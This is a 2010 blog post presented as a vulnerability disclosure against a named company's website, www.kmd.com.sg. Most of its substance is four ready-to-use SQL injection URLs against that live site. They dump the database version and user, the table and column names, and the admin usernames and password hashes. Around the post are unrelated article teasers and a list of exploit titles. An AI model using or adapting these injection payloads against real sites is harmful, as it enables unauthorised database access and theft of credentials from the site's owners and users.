Critical SQL Injection in www.kmd.com KMD Group of Companies

Home / Hacking, News, Security / Critical SQL Injection in www.kmd.com KMD Group of Companies

August 26, 2010 PlanetCreator 0 Comments 0 tags

PlanetCreator.Net’s Security Team Member Info Freakzz <infofreakzzz(at)gmail.com> has reported another critical SQL Injection (vulnerability) on http://www.kmd.com.sg owned by KMD Group of Companies

These are some information from Vulneral Site http://www.kmd.com.sg :

his vulnerability has been alerted to :- [email protected]

@@version, user(), DB

<a href="http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,group_concat%28@@version,0x3a,user%28%29,0x3a,database%28%29%29,5,6,7,8--" target="_blank">http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select</a>

tbl

<a href="http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,concat%28table_name%29,5,6,7,8%20from%20information_schema.tables%20where%20table_schema=database%28%29--" target="_blank">http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select</a>

col

<a href="http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,concat%28column_name%29,5,6,7,8%20from%20information_schema.columns%20where%20table_schema=database%28%29--" target="_blank">http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select</a>

usr & pass hash

<a href="http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select%201,2,3,concat%28adm_user_name,0x3a,adm_user_password%29,5,6,7,8%20from%20kmd_admuser--" target="_blank">http://www.kmd.com.sg/index.php?page=Computing%20Courses&amp;Action=3&amp;ipar=-1%20union%20all%20select</a>

We hope that your security staff will look into this issue and fix it as soon as possible.

Thx – Infofreakzzz for sending security updates!

Explore More

Visit to Myanmar —-~_~—

ShweDagon Pagoda @ Yangon, Myanmar INTO’s Education Seminar @ Trader Hotel Myanmar ICT Exhibition 2010 @ Tatmataw Hall, Yangon btw, Now I’m @ NEW WAVE Cyber Cafe, No. 12/A D1,

Ur email can be intercepted!

Top 10 Places Your Email Can Be Intercepted The Internet has radically changed the way we communicate with each other. Email is obviouslyan extremely valuable and ubiquitous form of communication,

You’ve Hired a Hacker (Section 4)

Section 4: Stimulus and response 4.1: My hacker did something good, and I want to reward him. Good! Here are some of the things most hackers would like to receive

[local] glibc 2.38 - Buffer Overflow
on February 11, 2026 at 12:00 am
glibc 2.38 - Buffer Overflow
[remote] Windows 10.0.17763.7009 - spoofing vulnerability
on February 11, 2026 at 12:00 am
Windows 10.0.17763.7009 - spoofing vulnerability
[webapps] motionEye 0.43.1b4 - RCE
on February 11, 2026 at 12:00 am
motionEye 0.43.1b4 - RCE
[webapps] FortiWeb Fabric Connector 7.6.x - SQL Injection to Remote Code Execution
on February 4, 2026 at 12:00 am
FortiWeb Fabric Connector 7.6.x - SQL Injection to Remote Code Execution
[local] Docker Desktop 4.44.3 - Unauthenticated API Exposure
on February 4, 2026 at 12:00 am
Docker Desktop 4.44.3 - Unauthenticated API Exposure